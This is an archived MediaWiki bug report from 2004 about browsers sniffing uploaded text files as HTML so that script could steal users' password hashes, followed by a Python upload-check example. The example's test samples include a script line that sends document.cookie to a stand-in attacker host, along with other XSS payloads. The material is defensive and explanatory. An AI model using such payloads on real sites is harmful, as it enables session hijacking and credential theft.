Last modified: 2005-07-14 05:30:18 UTC

This bug report was migrated from Wikimedia Bugzilla to Wikimedia Phabricator; the Bugzilla archive is read-only and kept for historical purposes. See T2566, the corresponding Phabricator task, for complete and up-to-date bug report information.
Bug 566 - serious security bug in mediawiki (Yaohua2000)
Status: RESOLVED FIXED
Product: MediaWiki
Classification: Unclassified
Component: General/Unknown
Version: unspecified
Hardware/OS: All / All
Priority/Severity: High / major
Assigned To: Nobody
Blocks: javascript
Reported: 2004-09-23 10:59 UTC by Jerome Jamnicky
Modified: 2005-07-14 05:30 UTC
Description Jerome Jamnicky 2004-09-23 10:59:55 UTC
There is some kind of problem where someone may steal the md5 hash of your
password, apparently.  It was reported by Yaohua2000 on #mediawiki but he
cannot use bugzilla.  He gave this URL: http://en.wikipedia.org/upload/5/59/Tmp.txt
Comment 1 Domas Mituzas 2004-09-23 11:02:17 UTC
well, servers give out Content-type: text/plain, so that is a flaw of a browser,
if it handles non-text/html documents as html. On the other hand, all downloads
might be served from *.wikidownloads.org, so *wikipedia or *wikimedia cookies
would not apply.
Comment 2 Jamesday 2004-09-23 12:17:11 UTC
Reporter noted that "I've tested on opera,safari,ie,camino (mac os x) and ie
(win32) and mozilla,konqueror (linux) only ie (on both mac and win32) and safari
with the problem".

Users of the affected browsers should not view the text file - their password
will be stolen if they do. Changing password before you view it will cause the
new one to be stolen instead, then you can change back later.
Comment 3 Brion Vibber 2004-10-10 09:25:54 UTC
Apparently no one remembered to update this bug report...

1.4cvs & 1.3.5 include stricter checks on uploads to help close the gaping holes
in IE, and we've moved the uploads on Wikipedia to an alternate domain for now
to reduce exposure to the main wikis.

1.4cvs now uses a generated token instead of the hashed hashed password for the
'remember my password' mode. This has also been backported to Wikipedia's
servers, but isn't yet included in 1.3 release as it makes some database
changes. This should be more secure against dictionary attacks to recover the
plaintext, but is still usable to login if you can snarf it.

In Windows XP SP2, IE now has a security option "Open files based on content,
not file extension". You might think that turning this off would close the
security hole, but unfortunately you'd be wrong; it still interprets ".txt" as
"it's okay to think this is HTML and run JavaScript, even though neither the
Content-Type header nor the 'extension' you think you see look like '.html' at
all". Sigh.

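The "stricter checks on uploads" in Comment 3 are a server-side answer to the browser behaviour described in Comments 1 and 3: if a file stored as text/plain contains something IE would sniff as HTML, refuse the upload. The following is an added example written for this page, not MediaWiki's own upload code. The 1024-byte window, the marker list, the attribute patterns and the sample files are all this example's own assumptions and constructions; the sample named tmp.txt is invented and is not the Tmp.txt from the report.

```python
from __future__ import annotations

import re

# IE's sniffer decides on the leading bytes of a response, so inspecting a
# leading window is enough to catch what it would act on. 1024 bytes is
# this example's choice, not a figure from the bug report.
SNIFF_WINDOW = 1024

# Tags whose presence near the start of a "text" file is enough for a
# sniffing browser to decide the document is HTML (list assembled for
# this example).
HTML_MARKERS = (
    b"<!doctype", b"<html", b"<head", b"<body", b"<title", b"<script",
    b"<object", b"<embed", b"<applet", b"<meta", b"<style", b"<link",
    b"<iframe", b"<frameset", b"<img", b"<a href", b"<table", b"<pre",
    b"<!--",
)

# Script vectors that work without a recognisable document tag.
SCRIPT_PATTERNS = (
    re.compile(rb"<[a-z][^>]*\son[a-z]+\s*=", re.I),    # <x onload=...>
    re.compile(rb"(?:javascript|vbscript)\s*:", re.I),   # javascript: URIs
)


def normalize(data: bytes) -> bytes:
    """Return the leading window as plain bytes, undoing encodings that
    would hide ASCII tags from a naive byte search (UTF-8/UTF-16 BOMs)."""
    head = data[:SNIFF_WINDOW]
    if head.startswith(b"\xef\xbb\xbf"):
        head = head[3:]
    elif head.startswith((b"\xff\xfe", b"\xfe\xff")):
        enc = "utf-16-le" if head[0] == 0xFF else "utf-16-be"
        head = head[2:].decode(enc, "ignore").encode("ascii", "ignore")
    return head


def looks_like_html(data: bytes) -> bool:
    """True if a browser that sniffs content could treat this as HTML."""
    head = normalize(data)
    low = head.lower()
    if any(marker in low for marker in HTML_MARKERS):
        return True
    return any(pattern.search(head) for pattern in SCRIPT_PATTERNS)


def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Accept/reject decision for one upload, with a reason string."""
    if looks_like_html(data):
        return False, f"{filename}: content would be sniffed as HTML, rejected"
    return True, f"{filename}: accepted"


def rejected_uploads(files: dict[str, bytes]) -> list[str]:
    """Names of the uploads that fail the check, sorted."""
    return sorted(name for name, data in files.items()
                  if not check_upload(name, data)[0])


# Constructed sample uploads for this example (tmp.txt here is invented,
# not the Tmp.txt referenced in the bug report).
SAMPLES = {
    "notes.txt": b"Meeting notes\n- look at bug 566\n",
    "angle.txt": b"if a < b and c > d then swap\n",
    "tmp.txt": (b"   <html><script>"
                b"document.location='http://attacker.invalid/?c='+document.cookie"
                b"</script></html>"),
    "img.txt": b'<IMG SRC="x" onerror="alert(document.cookie)">',
    "wide.txt": b"\xff\xfe" + "<script>alert(1)</script>".encode("utf-16-le"),
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(check_upload(name, data)[1])
```

A check like this only narrows the gap, since it is a guess at what a particular sniffer will accept; the durable fix is the one Comments 1 and 3 describe, serving user uploads from a separate domain so that the wiki's session cookies are never in scope for whatever script does run there.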